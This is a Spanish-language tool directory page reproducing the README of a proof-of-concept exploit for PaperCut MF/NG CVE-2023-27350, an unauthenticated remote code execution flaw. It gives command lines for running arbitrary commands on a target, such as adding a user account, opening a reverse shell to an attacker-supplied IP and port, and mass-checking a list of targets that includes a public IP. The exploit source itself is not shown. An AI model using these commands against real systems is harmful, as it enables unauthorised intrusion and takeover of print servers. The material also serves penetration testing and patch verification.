Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27350 — Exploit para Papercut CVE-2023-27350. [+] Reverse shell [+] Comprobación masiva | Kitploit
Herramientas/GitHubGitHub/adhikara13/cve-2023-27350
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Exploit para Papercut CVE-2023-27350. [+] Reverse shell [+] Comprobación masiva

Ver Repositorio
932hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-27350 Exploit POC

Este es un exploit de prueba de concepto (POC) para CVE-2023-27350, una vulnerabilidad encontrada en PaperCut MF/NG que permite a un atacante no autenticado ejecutar código arbitrario con privilegios de SYSTEM.

Requisitos

Antes de usar este exploit, asegúrate de tener instaladas las siguientes librerías:

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

Opciones

  • -u, --url: La URL de la aplicación objetivo PaperCut MF/NG (p. ej., http://target-ip:9191).
  • -c, --command: El comando a ejecutar en el sistema objetivo.
  • --reverse-shell: Usa un payload de reverse shell para ejecutar comandos en el sistema objetivo.
  • -f, --file: Comprueba múltiples objetivos desde un archivo (p. ej., file.txt).

Ejemplo

Ejecutar Comando

Para ejecutar un comando en el sistema objetivo, usa la opción -c:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

Reverse Shell

Para usar un payload de reverse shell y ejecutar comandos en el sistema objetivo, usa la opción --reverse-shell. Se te pedirá tu dirección IP y número de puerto:

root@kitploit:~
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>

Comprobación Masiva

Para comprobar múltiples objetivos desde un archivo, usa la opción -f. El formato del archivo debe ser ip_address:port:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

Formato del file.txt

Cuando uses la opción de comprobación masiva con el archivo file.txt, asegúrate de que el contenido del archivo tenga el formato correcto.

Cada línea del archivo debe contener la dirección IP y el número de puerto de un objetivo, separados por dos puntos :. Por ejemplo:

root@kitploit:~
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

Asegúrate de que no haya espacios ni caracteres adicionales entre la dirección IP, los dos puntos y el número de puerto. Además, asegúrate de que cada línea contenga solo una dirección IP y un número de puerto.

Créditos

Este es un fork del repositorio horizon3ai/CVE-2023-27350. Todo el crédito del exploit original corresponde a sus autores.

Descargar herramienta